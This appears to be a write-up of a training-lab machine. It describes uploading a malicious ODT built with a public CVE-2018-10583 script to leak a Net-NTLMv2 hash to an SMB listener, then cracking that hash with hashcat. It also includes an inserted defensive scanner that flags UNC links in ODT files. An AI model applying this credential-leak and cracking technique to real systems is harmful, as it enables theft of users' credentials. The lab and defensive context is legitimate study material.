Phishing
The target web application supports a file upload that accepts ODT files, which strongly suggests that it might be possible to perform a phishing attack with a macro-enabled ODT payload.
Changing the file extension to .odt works.
The response mentions that the file will be reviewed and they are aware of the macro phishing attempts.
Attempt 1 (Fail)
Uploading a macro-enabled ODT payload.
However, nothing is coming through on the listener.
This is rather expected as they claim to be aware of the macro phishing attempts.
A different approach is required.
Attempt 2 (Success)
Looking up another way to exploit ODT files leads to an Exploit-DB entry.
It’s also locally available and it targets CVE-2018-10583.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ python2 CVE-2018-10583.py
____ __ ____ ____ ______
/ __ )____ _____/ / / __ \/ __ \/ ____/
/ __ / __ `/ __ /_____/ / / / / / / /_
/ /_/ / /_/ / /_/ /_____/ /_/ / /_/ / __/
/_____/\__,_/\__,_/ \____/_____/_/
Create a malicious ODF document help leak NetNTLM Creds
By Richard Davy
@rd_pentest
www.secureyourit.co.uk
Please enter IP of listener: 192.168.45.158
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ ll bad.odt
8.0K -rw-rw-r-- 1 kali kali 5.7K Jul 4 18:50 bad.odt
Executing the exploit script generates the bad.odt file.
Upload complete
It hit the SMB server running on Kali as the thecybergeek user and leaked the Net-NTLMv2 hash.
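From the defender's side, a scanner for this class of document, added here as an example that is neither the writeup's nor the exploit script's code: it unpacks an ODT (a zip of XML parts) and flags any xlink:href that points at a UNC or smb: location, the mechanism by which a document can make the opening host authenticate to an attacker's SMB listener. It assumes that the leak is triggered by such an external link in the document XML (the writeup does not detail the payload), and the sample ODT, the host 10.0.0.1 and the share name are constructed.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
# Link targets that would make the viewer talk SMB: UNC paths (\\host\share),
# protocol-relative //host/share, and explicit smb: URLs.
REMOTE_LINK = re.compile(r"^(\\\\|//|smb:)", re.IGNORECASE)


def find_remote_links(odt_bytes):
    """Return (xml part, href) for every xlink:href that points at an SMB/UNC location."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".xml"):
                continue  # mimetype, Pictures/, Thumbnails/ etc. are not link carriers
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                continue  # malformed part: nothing to inspect here
            for el in root.iter():  # any element may carry the link, so walk them all
                href = el.get(XLINK_HREF)
                if href and REMOTE_LINK.match(href.strip()):
                    hits.append((name, href))
    return hits


def build_sample_odt(href):
    """Constructed minimal ODT: mimetype plus a content.xml holding one external link."""
    content = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
        'xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" '
        'xmlns:xlink="http://www.w3.org/1999/xlink" office:version="1.2">'
        '<office:body><office:text><text:p>'
        '<text:a xlink:type="simple" xlink:href="%s">link</text:a>'
        '</text:p></office:text></office:body></office:document-content>' % href
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        z.writestr("content.xml", content)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed UNC target; a real upload filter would read the uploaded bytes instead.
    print(find_remote_links(build_sample_odt(r"\\10.0.0.1\share\doc")))
    print(find_remote_links(build_sample_odt("https://example.test/doc")))
```

An upload handler that runs find_remote_links on each received ODT and rejects any with hits would have stopped this step before the document ever reached a reviewer.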
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ hashcat -a 0 -m 5600 thecybergeek.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
THECYBERGEEK::CRAFT2:aaaaaaaaaaaaaaaa:9676029a44693e7df711a8a9b4e39fc5:[...]:winniethepooh
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: THECYBERGEEK::CRAFT2:aaaaaaaaaaaaaaaa:9676029a44693...000000
Time.Started.....: Fri Jul 4 18:55:18 2025 (0 secs)
Time.Estimated...: Fri Jul 4 18:55:18 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3033.2 kH/s (1.87ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 12288/14344385 (0.09%)
Rejected.........: 0/12288 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> hawkeye
Hardware.Mon.#1..: Util: 10%
Started: Fri Jul 4 18:55:16 2025
Stopped: Fri Jul 4 18:55:20 2025
Password hash cracked for the thecybergeek user: winniethepooh
Validating against the target SMB server.